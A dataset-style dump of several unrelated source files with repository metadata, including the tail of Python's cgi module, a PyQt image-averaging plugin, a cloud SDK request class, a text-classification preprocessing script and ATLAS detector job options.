qs += '&' + self.qs_on_post
query = urllib.parse.parse_qsl(
qs, self.keep_blank_values, self.strict_parsing,
encoding=self.encoding, errors=self.errors,
max_num_fields=self.max_num_fields)
self.list = [MiniFieldStorage(key, value) for key, value in query]
self.skip_lines()
FieldStorageClass = None
def read_multi(self, environ, keep_blank_values, strict_parsing):
"""Internal: read a part that is itself multipart."""
ib = self.innerboundary
if not valid_boundary(ib):
raise ValueError('Invalid boundary in multipart form: %r' % (ib,))
self.list = []
if self.qs_on_post:
query = urllib.parse.parse_qsl(
self.qs_on_post, self.keep_blank_values, self.strict_parsing,
encoding=self.encoding, errors=self.errors,
max_num_fields=self.max_num_fields)
self.list.extend(MiniFieldStorage(key, value) for key, value in query)
klass = self.FieldStorageClass or self.__class__
first_line = self.fp.readline() # bytes
if not isinstance(first_line, bytes):
raise ValueError("%s should return bytes, got %s" \
% (self.fp, type(first_line).__name__))
self.bytes_read += len(first_line)
# Ensure that we consume the file until we've hit our inner boundary
while (first_line.strip() != (b"--" + self.innerboundary) and
first_line):
first_line = self.fp.readline()
self.bytes_read += len(first_line)
# Propagate max_num_fields into the sub class appropriately
max_num_fields = self.max_num_fields
if max_num_fields is not None:
max_num_fields -= len(self.list)
while True:
parser = FeedParser()
hdr_text = b""
while True:
data = self.fp.readline()
hdr_text += data
if not data.strip():
break
if not hdr_text:
break
# parser takes strings, not bytes
self.bytes_read += len(hdr_text)
parser.feed(hdr_text.decode(self.encoding, self.errors))
headers = parser.close()
# Some clients add Content-Length for part headers, ignore them
if 'content-length' in headers:
del headers['content-length']
limit = None if self.limit is None \
else self.limit - self.bytes_read
part = klass(self.fp, headers, ib, environ, keep_blank_values,
strict_parsing, limit,
self.encoding, self.errors, max_num_fields)
if max_num_fields is not None:
max_num_fields -= 1
if part.list:
max_num_fields -= len(part.list)
if max_num_fields < 0:
raise ValueError('Max number of fields exceeded')
self.bytes_read += part.bytes_read
self.list.append(part)
if part.done or self.bytes_read >= self.length > 0:
break
self.skip_lines()
def read_single(self):
"""Internal: read an atomic part."""
if self.length >= 0:
self.read_binary()
self.skip_lines()
else:
self.read_lines()
self.file.seek(0)
bufsize = 8*1024 # I/O buffering size for copy to file
def read_binary(self):
"""Internal: read binary data."""
self.file = self.make_file()
todo = self.length
if todo >= 0:
while todo > 0:
data = self.fp.read(min(todo, self.bufsize)) # bytes
if not isinstance(data, bytes):
raise ValueError("%s should return bytes, got %s"
% (self.fp, type(data).__name__))
self.bytes_read += len(data)
if not data:
self.done = -1
break
self.file.write(data)
todo = todo - len(data)
def read_lines(self):
"""Internal: read lines until EOF or outerboundary."""
if self._binary_file:
self.file = self.__file = BytesIO() # store data as bytes for files
else:
self.file = self.__file = StringIO() # as strings for other fields
if self.outerboundary:
self.read_lines_to_outerboundary()
else:
self.read_lines_to_eof()
def __write(self, line):
"""line is always bytes, not string"""
if self.__file is not None:
if self.__file.tell() + len(line) > 1000:
self.file = self.make_file()
data = self.__file.getvalue()
self.file.write(data)
self.__file = None
if self._binary_file:
# keep bytes
self.file.write(line)
else:
# decode to string
self.file.write(line.decode(self.encoding, self.errors))
def read_lines_to_eof(self):
"""Internal: read lines until EOF."""
while 1:
line = self.fp.readline(1<<16) # bytes
self.bytes_read += len(line)
if not line:
self.done = -1
break
self.__write(line)
def read_lines_to_outerboundary(self):
"""Internal: read lines until outerboundary.
Data is read as bytes: boundaries and line ends must be converted
to bytes for comparisons.
"""
next_boundary = b"--" + self.outerboundary
last_boundary = next_boundary + b"--"
delim = b""
last_line_lfend = True
_read = 0
while 1:
if self.limit is not None and _read >= self.limit:
break
line = self.fp.readline(1<<16) # bytes
self.bytes_read += len(line)
_read += len(line)
if not line:
self.done = -1
break
if delim == b"\r":
line = delim + line
delim = b""
if line.startswith(b"--") and last_line_lfend:
strippedline = line.rstrip()
if strippedline == next_boundary:
break
if strippedline == last_boundary:
self.done = 1
break
odelim = delim
if line.endswith(b"\r\n"):
delim = b"\r\n"
line = line[:-2]
last_line_lfend = True
elif line.endswith(b"\n"):
delim = b"\n"
line = line[:-1]
last_line_lfend = True
elif line.endswith(b"\r"):
# We may interrupt \r\n sequences if they span the 2**16
# byte boundary
delim = b"\r"
line = line[:-1]
last_line_lfend = False
else:
delim = b""
last_line_lfend = False
self.__write(odelim + line)
def skip_lines(self):
"""Internal: skip lines until outer boundary if defined."""
if not self.outerboundary or self.done:
return
next_boundary = b"--" + self.outerboundary
last_boundary = next_boundary + b"--"
last_line_lfend = True
while True:
line = self.fp.readline(1<<16)
self.bytes_read += len(line)
if not line:
self.done = -1
break
if line.endswith(b"--") and last_line_lfend:
strippedline = line.strip()
if strippedline == next_boundary:
break
if strippedline == last_boundary:
self.done = 1
break
last_line_lfend = line.endswith(b'\n')
def make_file(self):
"""Overridable: return a readable & writable file.
The file will be used as follows:
- data is written to it
- seek(0)
- data is read from it
The file is opened in binary mode for files, in text mode
for other fields
This version opens a temporary file for reading and writing,
and immediately deletes (unlinks) it. The trick (on Unix!) is
that the file can still be used, but it can't be opened by
another process, and it will automatically be deleted when it
is closed or when the current process terminates.
If you want a more permanent file, you derive a class which
overrides this method. If you want a visible temporary file
that is nevertheless automatically deleted when the script
terminates, try defining a __del__ method in a derived class
which unlinks the temporary files you have created.
"""
if self._binary_file:
return tempfile.TemporaryFile("wb+")
else:
return tempfile.TemporaryFile("w+",
encoding=self.encoding, newline = '\n')
# Test/debug code
# ===============
def test(environ=os.environ):
"""Robust test CGI script, usable as main program.
Write minimal HTTP headers and dump all information provided to
the script in HTML form.
"""
print("Content-type: text/html")
print()
sys.stderr = sys.stdout
try:
form = FieldStorage() # Replace with other classes to test those
print_directory()
print_arguments()
print_form(form)
print_environ(environ)
print_environ_usage()
def f():
exec("testing print_exception() -- <I>italics?</I>")
def g(f=f):
f()
print("<H3>What follows is a test, not an actual exception:</H3>")
g()
except:
print_exception()
print("<H1>Second try with a small maxlen...</H1>")
global maxlen
maxlen = 50
try:
form = FieldStorage() # Replace with other classes to test those
print_directory()
print_arguments()
print_form(form)
print_environ(environ)
except:
print_exception()
def print_exception(type=None, value=None, tb=None, limit=None):
if type is None:
type, value, tb = sys.exc_info()
import traceback
print()
print("<H3>Traceback (most recent call last):</H3>")
list = traceback.format_tb(tb, limit) + \
traceback.format_exception_only(type, value)
print("<PRE>%s<B>%s</B></PRE>" % (
html.escape("".join(list[:-1])),
html.escape(list[-1]),
))
del tb
def print_environ(environ=os.environ):
"""Dump the shell environment as HTML."""
keys = sorted(environ.keys())
print()
print("<H3>Shell Environment:</H3>")
print("<DL>")
for key in keys:
print("<DT>", html.escape(key), "<DD>", html.escape(environ[key]))
print("</DL>")
print()
def print_form(form):
"""Dump the contents of a form as HTML."""
keys = sorted(form.keys())
print()
print("<H3>Form Contents:</H3>")
if not keys:
print("<P>No form fields.")
print("<DL>")
for key in keys:
print("<DT>" + html.escape(key) + ":", end=' ')
value = form[key]
print("<i>" + html.escape(repr(type(value))) + "</i>")
print("<DD>" + html.escape(repr(value)))
print("</DL>")
print()
def print_directory():
"""Dump the current directory as HTML."""
print()
print("<H3>Current Working Directory:</H3>")
try:
pwd = os.getcwd()
except OSError as msg:
print("OSError:", html.escape(str(msg)))
else:
print(html.escape(pwd))
print()
def print_arguments():
print()
print("<H3>Command Line Arguments:</H3>")
print()
print(sys.argv)
print()
def print_environ_usage():
"""Dump a list of environment variables used by CGI as HTML."""
print("""
<H3>These environment variables could have been set:</H3>
<UL>
<LI>AUTH_TYPE
<LI>CONTENT_LENGTH
<LI>CONTENT_TYPE
<LI>DATE_GMT
<LI>DATE_LOCAL
<LI>DOCUMENT_NAME
<LI>DOCUMENT_ROOT
<LI>DOCUMENT_URI
<LI>GATEWAY_INTERFACE
<LI>LAST_MODIFIED
<LI>PATH
<LI>PATH_INFO
<LI>PATH_TRANSLATED
<LI>QUERY_STRING
<LI>REMOTE_ADDR
<LI>REMOTE_HOST
<LI>REMOTE_IDENT
<LI>REMOTE_USER
<LI>REQUEST_METHOD
<LI>SCRIPT_NAME
<LI>SERVER_NAME
<LI>SERVER_PORT
<LI>SERVER_PROTOCOL
<LI>SERVER_ROOT
<LI>SERVER_SOFTWARE
</UL>
In addition, HTTP headers sent by the server may be passed in the
environment as well. Here are some common variable names:
<UL>
<LI>HTTP_ACCEPT
<LI>HTTP_CONNECTION
<LI>HTTP_HOST
<LI>HTTP_PRAGMA
<LI>HTTP_REFERER
<LI>HTTP_USER_AGENT
</UL>
""")
# Utilities
# =========
def valid_boundary(s):
import re
if isinstance(s, bytes):
_vb_pattern = b"^[ -~]{0,200}[!-~]$"
else:
_vb_pattern = "^[ -~]{0,200}[!-~]$"
return re.match(_vb_pattern, s)
# Invoke mainline
# ===============
# Call test() when this file is run as a script (not imported as a module)
if __name__ == '__main__':
test()
| [
"[email protected]"
] | |
a7806cbd020f9a30ef0b3337e9f90d839d99a427 | da92caf06447ec7e244dfa11e71b551a4dab7d14 | /src/plugins/evoked_average.py | 21e26af5a91a55b09c07c45812ed17bb1e6ac9ab | [
"MIT"
] | permissive | Frikster/Mesoscale-Brain-Explorer | 28298adbcb49dc399f85fe4db1c3dc1263468677 | 269d8f18162e2b9dca4619561e73a6beb8ba810c | refs/heads/master | 2020-04-04T22:17:29.714298 | 2017-11-20T16:24:19 | 2017-11-20T16:24:19 | 61,849,037 | 5 | 6 | null | null | null | null | UTF-8 | Python | false | false | 4,036 | py | #!/usr/bin/env python3
import os
import numpy as np
import psutil
import qtutil
from PyQt4.QtGui import *
from .util import project_functions as pfs
from .util.plugin import PluginDefault
from .util.plugin import WidgetDefault
class Widget(QWidget, WidgetDefault):
class Labels(WidgetDefault.Labels):
pass
class Defaults(WidgetDefault.Defaults):
manip = 'evoked-avg'
def __init__(self, project, plugin_position, parent=None):
super(Widget, self).__init__(parent)
if not project or not isinstance(plugin_position, int):
return
self.avg_button = QPushButton('Generate Evoked Average')
WidgetDefault.__init__(self, project, plugin_position)
def setup_ui(self):
super().setup_ui()
self.vbox.addWidget(self.avg_button)
def setup_signals(self):
super().setup_signals()
self.avg_button.clicked.connect(self.execute_primary_function)
def execute_primary_function(self, input_paths=None):
if not input_paths:
if not self.selected_videos:
return
else:
selected_videos = self.selected_videos
else:
selected_videos = input_paths
progress_global = QProgressDialog('Creating evoked average...', 'Abort', 0, 100, self)
progress_global.setAutoClose(True)
progress_global.setMinimumDuration(0)
def global_callback(x):
progress_global.setValue(x * 100)
QApplication.processEvents()
filenames = selected_videos
if len(filenames) < 2:
qtutil.warning('Select multiple files to average.')
return
stacks = [np.load(f, mmap_mode='r') for f in filenames]
lens = [len(stacks[x]) for x in range(len(stacks))]
min_lens = np.min(lens)
breadth = stacks[0].shape[1]
length = stacks[0].shape[2]
trig_avg = np.empty((min_lens, length, breadth), np.load(filenames[0], mmap_mode='r').dtype)
for frame_index in range(min_lens):
global_callback(frame_index / min_lens)
frames_to_avg = [stacks[stack_index][frame_index]
for stack_index in range(len(stacks))]
frames_to_avg = np.array(frames_to_avg, dtype=np.float32)
avg = np.mean(frames_to_avg, axis=0, dtype=np.float32)
trig_avg[frame_index] = avg
global_callback(1)
manip = self.Defaults.manip + '_' + str(len(filenames))
output_path = pfs.save_project(filenames[0], self.project, trig_avg, manip, 'video')
pfs.refresh_list(self.project, self.video_list,
self.params[self.Labels.video_list_indices_label],
self.Defaults.list_display_type,
self.params[self.Labels.last_manips_to_display_label])
return output_path
# self.update_tables()
def setup_whats_this(self):
super().setup_whats_this()
self.avg_button.setWhatsThis("Generate evoked average for selected image stacks where each frame is averaged "
"across image stacks for each frame")
class MyPlugin(PluginDefault):
def __init__(self, project, plugin_position):
self.name = 'Evoked Average'
self.widget = Widget(project, plugin_position)
super().__init__(self.widget, self.widget.Labels, self.name)
def check_ready_for_automation(self, expected_input_number):
self.summed_filesize = 0
for path in self.widget.selected_videos:
self.summed_filesize = self.summed_filesize + os.path.getsize(path)
self.available = list(psutil.virtual_memory())[1]
if self.summed_filesize > self.available:
return False
return True
def automation_error_message(self):
return "Not enough memory. All files to be averaged together are of size ~"+str(self.summed_filesize) +\
" and available memory is: " + str(self.available)
| [
"[email protected]"
] | |
9fa71db652f5ba9a7efaf6487c314e53826c6153 | 187a6558f3c7cb6234164677a2bda2e73c26eaaf | /jdcloud_sdk/services/tidb/apis/DescribeAvailableDBInfoInternelRequest.py | e771d081b365e9d329da6981125f9fced96c4cf4 | [
"Apache-2.0"
] | permissive | jdcloud-api/jdcloud-sdk-python | 4d2db584acc2620b7a866af82d21658cdd7cc227 | 3d1c50ed9117304d3b77a21babe899f939ae91cd | refs/heads/master | 2023-09-04T02:51:08.335168 | 2023-08-30T12:00:25 | 2023-08-30T12:00:25 | 126,276,169 | 18 | 36 | Apache-2.0 | 2023-09-07T06:54:49 | 2018-03-22T03:47:02 | Python | UTF-8 | Python | false | false | 1,479 | py | # coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
from jdcloud_sdk.core.jdcloudrequest import JDCloudRequest
class DescribeAvailableDBInfoInternelRequest(JDCloudRequest):
"""
查询 TiDB支持的基本信息。
"""
def __init__(self, parameters, header=None, version="v1"):
super(DescribeAvailableDBInfoInternelRequest, self).__init__(
'/regions/{regionId}/instances:describeAvailableDBInfoInternel', 'GET', header, version)
self.parameters = parameters
class DescribeAvailableDBInfoInternelParameters(object):
def __init__(self,regionId, ):
"""
:param regionId: 地域代码
"""
self.regionId = regionId
self.azs = None
def setAzs(self, azs):
"""
:param azs: (Optional) 用户可用区[多个使用,分隔]
"""
self.azs = azs
| [
"[email protected]"
] | |
47d31b4ad6d9d3f9ec16487c975797465de7096d | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/22/usersdata/112/11794/submittedfiles/av1_2.py | 5ecfae8a8c59536c3785bab3a905bd43d390601a | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 317 | py | # -*- coding: utf-8 -*-
from __future__ import division
import math
ant=0
prox=0
meio=B
n=input('Digite o valor de n:')
j=input('Digite o valor de j:')
k=input('Digite o valor de k:')
l=input('Digite o valor de l:')
if n=k and j!=l:
print('verdadeira')
if j=l and n!=k:
print('verdadeira')
else:
('falsa') | [
"[email protected]"
] | |
9c125735232060d0d2ab96a7273d2ed807cb7f56 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/dev/cv/detection/YOLOX_ID2833_for_PyTorch/configs/mask2former/mask2former_swin-b-p4-w12-384-in21k_lsj_8x2_50e_coco-panoptic.py | 0141271ed055de4c1cb757b1cf83099916ad3b24 | [
"GPL-1.0-or-later",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 941 | py |
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) Open-MMLab. All rights reserved.
_base_ = ['./mask2former_swin-b-p4-w12-384_lsj_8x2_50e_coco-panoptic.py']
pretrained = 'https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_base_patch4_window12_384_22k.pth' # noqa
model = dict(
backbone=dict(init_cfg=dict(type='Pretrained', checkpoint=pretrained)))
| [
"[email protected]"
] | |
870d12fe6a587e970c108504b42268cb10c844f3 | 2ed2dd917afb05d194e87f989d78953b31a5781b | /lesson10/mission08.py | 718005e6a8b1523d4636183b46dc3a00179e899b | [] | no_license | RenegaDe1288/pythonProject | 4058d549db7c37652f77438c31f8b31476497d98 | 801c06f3be22ed63214987b11d6f1b3fd2fe5b44 | refs/heads/master | 2023-08-17T13:20:50.777842 | 2021-10-05T10:51:00 | 2021-10-05T10:51:00 | 393,145,207 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 498 | py | lent = int(input('Введите ширину '))
lent_2 = int(input('Введите длину '))
for row in range(lent):
for col in range(lent_2):
if col == lent_2 // 2 and row != lent//2:
print('|', end='')
elif row == lent // 2:
print('-', end='')
elif col == lent_2//2 + 5+ row:
print('\\', end='')
elif col == lent_2//2- row -5:
print('/', end='')
else:
print(' ', end='')
print()
| [
"[email protected]"
] | |
473d655633f7f72afa53daced7e8c8a4a90c4f51 | a209c2238ff97d781fc6f15d9b3ae6ecf9c15b53 | /utils/preprocess.py | 6b7077e20c2ba3b9257a3940756e4f54e10dd416 | [] | no_license | Arcana-2236/Text-Classification | 1788e05e4c29ce0e7130f38cd16af5ab08fbe6fd | 69047f0ffdfc621e3cb2d59056ac93d69582090b | refs/heads/master | 2022-04-12T08:30:50.089277 | 2020-03-28T06:09:16 | 2020-03-28T06:09:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,234 | py | import os
import re
import zipfile
import pickle
import jieba
import pandas as pd
import numpy as np
from collections import Counter
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
from sklearn.preprocessing import MultiLabelBinarizer
from sklearn.model_selection import train_test_split
ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# input file
ZIP_DATA = os.path.join(ROOT, 'data', '百度题库.zip') # 要解压的文件
STOPWORDS = os.path.join(ROOT, 'data', 'stopwords.txt')
# output file path
# BERT
TRAIN_TSV = os.path.join(ROOT, 'data', 'train.tsv') # BERT的数据文件
DEV_TSV = os.path.join(ROOT, 'data', 'dev.tsv')
TEST_TSV = os.path.join(ROOT, 'data', 'test.tsv')
# TextCNN and Transformer
TOKENIZER_BINARIZER = os.path.join(ROOT, 'data', 'tokenizer_binarizer.pickle')
LABELS_FILE = os.path.join(ROOT, 'data', 'label.txt')
X_NPY = os.path.join(ROOT, 'data', 'x.npy') # testcnn 和 transformer的数据文件
Y_NPY = os.path.join(ROOT, 'data', 'y.npy')
def unzip_data():
"""
解压数据
"""
with zipfile.ZipFile(ZIP_DATA, 'r') as z:
z.extractall(os.path.join(ROOT, 'data'))
print("已将压缩包解压至{}".format(z.filename.rstrip('.zip')))
return z.filename.rstrip('.zip')
def combine_data(data_path):
"""
把四门科目内的所有文件合并
"""
r = re.compile(r'\[知识点:\]\n(.*)') # 用来寻找知识点的正则表达式
r1 = re.compile(r'纠错复制收藏到空间加入选题篮查看答案解析|\n|知识点:|\s|\[题目\]') # 简单清洗
data = []
for root, dirs, files in os.walk(data_path):
if files: # 如果文件夹下有csv文件
for f in files:
subject = re.findall('高中_(.{2})', root)[0]
topic = f.strip('.csv')
tmp = pd.read_csv(os.path.join(root, f)) # 打开csv文件
tmp['subject'] = subject # 主标签:科目
tmp['topic'] = topic # 副标签:科目下主题
tmp['knowledge'] = tmp['item'].apply(
lambda x: r.findall(x)[0].replace(',', ' ') if r.findall(x) else '')
tmp['item'] = tmp['item'].apply(lambda x: r1.sub('', r.sub('', x)))
data.append(tmp)
data = pd.concat(data).rename(columns={'item': 'content'}).reset_index(drop=True)
# 删掉多余的两列
data.drop(['web-scraper-order', 'web-scraper-start-url'], axis=1, inplace=True)
return data
def extract_label(df, freq=0.01):
"""
:param df: 合并后的数据集
:param freq: 要过滤的标签占样本数量的比例
:return: DataFrame
"""
knowledges = ' '.join(df['knowledge']).split() # 合并
knowledges = Counter(knowledges)
k = int(df.shape[0] * freq) # 计算对应频率知识点出现的次数
print('过滤掉出现次数少于 %d 次的标签' % k)
top_k = {i for i in knowledges if knowledges[i] > k} # 过滤掉知识点出现次数小于k的样本
df.knowledge = df.knowledge.apply(lambda x: ' '.join([label for label in x.split() if label in top_k]))
df['label'] = df[['subject', 'topic', 'knowledge']].apply(lambda x: ' '.join(x), axis=1)
return df[['label', 'content']]
def create_bert_data(df, small=False):
"""
对于 bert 的预处理
如果small=True:是因为自己的电脑太菜,就用比较小的数据量在本地实现模型
该函数给bert模型划分了3个数据集
"""
df['content'] = df['content'].apply(lambda x: x.replace(' ', ''))
if small:
print('use small dataset to test my local bert model really work')
train = df.sample(128)
dev = df.sample(64)
test = df.sample(64)
else:
train, test = train_test_split(df, test_size=0.2, random_state=2020)
train, dev = train_test_split(train, test_size=0.2, random_state=2020)
print('preprocess for bert!')
print('create 3 tsv file(train, dev, test) in %s' % (os.path.join(ROOT, 'data')))
train.to_csv(TRAIN_TSV, index=None, sep='\t')
dev.to_csv(DEV_TSV, index=None, sep='\t')
test.to_csv(TEST_TSV, index=None, sep='\t')
def load_stopwords():
return {line.strip() for line in open(STOPWORDS, encoding='UTF-8').readlines()}
def sentence_preprocess(sentence):
# 去标点
r = re.compile("[^\u4e00-\u9fa5]+|题目")
sentence = r.sub("", sentence) # 删除所有非汉字字符
# 切词
words = jieba.cut(sentence, cut_all=False)
# 去停用词
stop_words = load_stopwords()
words = [w for w in words if w not in stop_words]
return words
def df_preprocess(df):
"""
合并了去标点,切词,去停用词的操作
:param df:
:return:
"""
df.content = df.content.apply(sentence_preprocess)
return df
def create_testcnn_data(df, num_words=50000, maxlen=128):
# 对于label处理
mlb = MultiLabelBinarizer()
y = mlb.fit_transform(df.label.apply(lambda label: label.split()))
with open(LABELS_FILE, mode='w', encoding='utf-8') as f:
for label in mlb.classes_:
f.write(label+'\n')
# 对content处理
tokenizer = Tokenizer(num_words=num_words, oov_token="<UNK>")
tokenizer.fit_on_texts(df.content.tolist())
x = tokenizer.texts_to_sequences(df.content)
x = pad_sequences(x, maxlen=maxlen, padding='post', truncating='post') # padding
# 保存数据
np.save(X_NPY, x)
np.save(Y_NPY, y)
print('已创建并保存x,y至:\n {} \n {}'.format(X_NPY, Y_NPY))
# 同时还要保存tokenizer和 multi_label_binarizer
# 否则训练结束后无法还原把数字还原成文本
tb = {'tokenizer': tokenizer, 'binarizer': mlb} # 用个字典来保存
with open(TOKENIZER_BINARIZER, 'wb') as f:
pickle.dump(tb, f)
print('已创建并保存tokenizer和binarizer至:\n {}'.format(TOKENIZER_BINARIZER))
def load_testcnn_data():
"""
如果分开保存,那要保存6个文件太麻烦了。
所以采取读取之后划分数据集的方式
"""
# 与之前的bert同步
x = np.load(X_NPY).astype(np.float32)
y = np.load(Y_NPY).astype(np.float32)
# 与之前bert的划分方式统一
train_x, test_x, train_y, test_y = train_test_split(x, y, test_size=0.2, random_state=2020)
train_x, dev_x, train_y, dev_y = train_test_split(train_x, train_y, test_size=0.2, random_state=2020)
return train_x, dev_x, test_x, train_y, dev_y, test_y
def load_tokenizer_binarizer():
"""
读取tokenizer 和 binarizer
:return:
"""
with open(TOKENIZER_BINARIZER, 'rb') as f:
tb = pickle.load(f)
return tb['tokenizer'], tb['binarizer']
def main():
"""
合并以上所有操作
"""
data_path = unzip_data() # 解压
df = combine_data(data_path) # 合并
df = extract_label(df) # 提取标签
# 对于bert的预处理
create_bert_data(df)
# 对于testcnn和transformer的预处理
df = df_preprocess(df) # 切词,分词,去停用词
create_testcnn_data(df, num_words=50000, maxlen=128)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
4cb105211199b388e964f55bb905a04d35572cf9 | b22588340d7925b614a735bbbde1b351ad657ffc | /athena/LArCalorimeter/LArTest/LArConditionsTest/share/FixLArElecCalib_fix6_jobOptions.py | 59efd81bb72cab9f075cafd0a9f3b68c0147137b | [] | no_license | rushioda/PIXELVALID_athena | 90befe12042c1249cbb3655dde1428bb9b9a42ce | 22df23187ef85e9c3120122c8375ea0e7d8ea440 | refs/heads/master | 2020-12-14T22:01:15.365949 | 2020-01-19T03:59:35 | 2020-01-19T03:59:35 | 234,836,993 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,813 | py | ###############################################################
#
# Job options file 1
#
#==============================================================
#use McEventSelector
include( "AthenaCommon/Atlas_Gen.UnixStandardJob.py" )
from AthenaCommon.DetFlags import DetFlags
DetFlags.Calo_setOn()
DetFlags.ID_setOff()
DetFlags.Muon_setOff()
DetFlags.Truth_setOff()
DetFlags.LVL1_setOff()
DetFlags.digitize.all_setOff()
from AthenaCommon.GlobalFlags import GlobalFlags
GlobalFlags.DataSource.set_geant4()
GlobalFlags.InputFormat.set_pool()
GlobalFlags.DetGeo.set_atlas()
DetDescrVersion = "ATLAS-CSC-02-00-00"
# DetDescrVersion = "ATLAS-DC3-05"
# LArIdMapFix=7
# G4Phys ="QGSP_EMV"
# G4Phys ="QGSP_BERT"
# Switches:
# items
RunNumber = 1
#
RecreateFolder = False
WriteIOV = True
# Objects and its tag
ObjectList = []
TagList = []
# FIX
if DetDescrVersion == "ATLAS-CSC-02-00-00" :
TagNameForFix = "CSC02-F"
else :
TagNameForFix = "Wrong"
print " ERROR: wrong DetDescrVersion"
ObjectList += ["LArNoiseMC#LArNoise#/LAR/ElecCalibMC/Noise"]
ObjectList += ["LAruA2MeVMC#LAruA2MeV#/LAR/ElecCalibMC/uA2MeV"]
ObjectList += ["LArDAC2uAMC#LArDAC2uA#/LAR/ElecCalibMC/DAC2uA"]
ObjectList += ["LArRampMC#LArRamp#/LAR/ElecCalibMC/Ramp"]
TagList += ["LARElecCalibMCNoise-"+TagNameForFix]
TagList += ["LARElecCalibMCuA2MeV-"+TagNameForFix]
TagList += ["LARElecCalibMCDAC2uA-"+TagNameForFix]
TagList += ["LARElecCalibMCRamp-"+TagNameForFix]
OutputPOOLFileName = "LArFCalADC2MeV_13.0.30_v1.pool.root"
#/--------------------------------------------------------------
# Algorithm to fix the LAr Id, if needed
#/-------------------------------
theApp.Dlls += [ "LArConditionsTest" ]
theApp.TopAlg += [ "FixLArElecCalib" ]
FixLArElecCalib = Algorithm("FixLArElecCalib")
# 1=
# 2=fix for IdMapFix=1
# 3=new fsample for CSC-02
# 5=new FCAL noise and minbias
FixLArElecCalib.FixFlag =6
#--------------------------------------------------------------
# Private Application Configuration options
#--------------------------------------------------------------
theApp.Dlls += [ "LArTools" ]
include ("AtlasGeoModel/SetGeometryVersion.py")
include ("AtlasGeoModel/GeoModelInit.py")
# Other LAr related
include( "LArIdCnv/LArIdCnv_joboptions.py" )
include( "CaloDetMgrDetDescrCnv/CaloDetMgrDetDescrCnv_joboptions.py" )
include( "IdDictDetDescrCnv/IdDictDetDescrCnv_joboptions.py" )
include( "LArConditionsCommon/LArConditionsCommon_MC_jobOptions.py" )
include( "LArConditionsCommon/LArIdMap_MC_jobOptions.py" )
#--------------------------------------------------------------
EventSelector = Service( "EventSelector" )
EventSelector.RunNumber=1
#EventSelector.EventsPerRun=10;
EventSelector.EventsPerRun=2
EventSelector.FirstEvent=1
# theApp.Dlls += [ "PoolSvc", "AthenaPoolCnvSvc", "AthenaPoolCnvSvcPoolCnv", "EventAthenaPoolPoolCnv", "EventSelectorAthenaPool" ]
include( "AthenaPoolCnvSvc/AthenaPool_jobOptions.py" )
theApp.Dlls += [ "AthenaPoolCnvSvc" ]
theApp.Dlls += [ "LArCondAthenaPoolPoolCnv" ]
include( "AthenaSealSvc/AthenaSealSvc_joboptions.py" )
# AthenaSealSvc.CheckDictAtInit = True
include ("LArRawConditions/LArRawConditionsDict_joboptions.py")
# include ("LArTools/LArToolsDict_joboptions.py")
theApp.EvtMax=1
AthenaEventLoopMgr=Service("AthenaEventLoopMgr")
AthenaEventLoopMgr.OutputLevel = INFO
MessageSvc = Service( "MessageSvc" )
MessageSvc.OutputLevel = INFO
MessageSvc.defaultLimit = 1000000;
MessageSvc.Format = "% F%20W%S%7W%R%T %0W%M"
theApp.Dlls += [ "GaudiAud" ]
theAuditorSvc = AuditorSvc()
theAuditorSvc.Auditors = [ "ChronoAuditor" ]
##############################################
# Writing POOL and COOL
if len(ObjectList)>0 :
# include regstration alg (default is WriteIOV = False)
include("RegistrationServices/OutputConditionsAlg_jobOptions.py")
# List of objects container type#key#foldername
OutputConditionsAlg.ObjectList = ObjectList
OutputConditionsAlg.IOVTagList = TagList
ToolSvc = Service("ToolSvc")
ToolSvc.ConditionsAlgStream.OutputFile = OutputPOOLFileName
# Set flag to register and run interval Run1/Event1 to Run2/Event2
# Usually, only need to set Run1, others go to default
####
OutputConditionsAlg.WriteIOV = WriteIOV
OutputConditionsAlg.Run1 = 0
OutputConditionsAlg.LB1 = 0
# Set the connection string
include ( "IOVDbSvc/IOVDbSvc_jobOptions.py" )
IOVDbSvc = Service( "IOVDbSvc" )
IOVDbSvc.dbConnection="impl=cool;techno=sqlite;schema=LArElecCalib_FCalADC2MeV.db;X:OFLP200"
# For schema creation - only should be used when creating the folder,
# i.e. the first time
